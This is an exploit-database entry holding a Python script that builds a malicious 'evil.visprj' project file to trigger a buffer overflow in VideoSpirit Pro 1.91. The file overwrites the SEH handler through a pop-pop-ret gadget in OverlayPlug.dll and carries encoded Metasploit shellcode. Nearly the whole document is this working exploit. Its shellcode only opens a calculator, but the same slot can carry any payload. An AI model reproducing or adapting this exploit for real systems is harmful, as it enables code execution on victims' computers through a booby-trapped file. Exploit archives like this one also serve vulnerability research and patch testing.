VideoSpirit Pro 1.91 Buffer Overflow

2015-04-27T00:00:00
ID PACKETSTORM:131647
Type packetstorm
Reporter evil_comrade
Modified 2015-04-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Exploit Title: VideoSpirit Pro v1.91   
# Date: 27/April/2015  
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan  
# email: kwiha2003@yahoo.com   
# Version: 1.91  
# Tested on: Win XP3 and Win 7  
#Vendor: http://www.verytools.com/  
#Software link: http://www.verytools.com/videospirit/download.html  
#Greetz: b33f,corelan,offsec,vulnhub,HUST510  
buffersize=5000  
Header=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+  
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+  
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+  
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+  
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+  
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+  
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+  
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+  
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+  
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+  
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+  
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+  
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+  
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+  
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+  
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+  
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+  
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+  
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+  
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+  
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+  
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+  
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+  
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+  
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+  
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+  
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+  
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+  
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+  
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")  
buffer="A"*104  
buffer += "\xEB\x07\x90\x90"  
#0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll]  
buffer +="\x30\xaa\x0C\x10"   
buffer += "\x90" * 24  
#msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x21\x22" -t c -e x86/shikata_ga_nai  
buffer += ("\xd9\xc3\xba\x97\xfd\x6f\x90\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"  
"\x32\x31\x56\x17\x03\x56\x17\x83\x79\x01\x8d\x65\x79\x12\xdb"  
"\x86\x81\xe3\xbc\x0f\x64\xd2\xee\x74\xed\x47\x3f\xfe\xa3\x6b"  
"\xb4\x52\x57\xff\xb8\x7a\x58\x48\x76\x5d\x57\x49\xb6\x61\x3b"  
"\x89\xd8\x1d\x41\xde\x3a\x1f\x8a\x13\x3a\x58\xf6\xdc\x6e\x31"  
"\x7d\x4e\x9f\x36\xc3\x53\x9e\x98\x48\xeb\xd8\x9d\x8e\x98\x52"  
"\x9f\xde\x31\xe8\xd7\xc6\x3a\xb6\xc7\xf7\xef\xa4\x34\xbe\x84"  
"\x1f\xce\x41\x4d\x6e\x2f\x70\xb1\x3d\x0e\xbd\x3c\x3f\x56\x79"  
"\xdf\x4a\xac\x7a\x62\x4d\x77\x01\xb8\xd8\x6a\xa1\x4b\x7a\x4f"  
"\x50\x9f\x1d\x04\x5e\x54\x69\x42\x42\x6b\xbe\xf8\x7e\xe0\x41"  
"\x2f\xf7\xb2\x65\xeb\x5c\x60\x07\xaa\x38\xc7\x38\xac\xe4\xb8"  
"\x9c\xa6\x06\xac\xa7\xe4\x4c\x33\x25\x93\x29\x33\x35\x9c\x19"  
"\x5c\x04\x17\xf6\x1b\x99\xf2\xb3\xd4\xd3\x5f\x95\x7c\xba\x35"  
"\xa4\xe0\x3d\xe0\xea\x1c\xbe\x01\x92\xda\xde\x63\x97\xa7\x58"  
"\x9f\xe5\xb8\x0c\x9f\x5a\xb8\x04\xfc\x3d\x2a\xc4\x03")  
buffer +="A"*(buffersize - (len(buffer)))  
Footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+  
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+  
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+  
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+  
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+  
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+  
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+  
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+  
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+  
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")  
sploit = Header + buffer + Footer  
try:  
print "[+]Creating Exploit File...\n"  
file = open("evil.visprj","w")   
file.write(sploit)  
file.close  
print "[+]File evil.visprj create successfully.\n"  
except:   
print "*Failed to create file!!!\n"  
`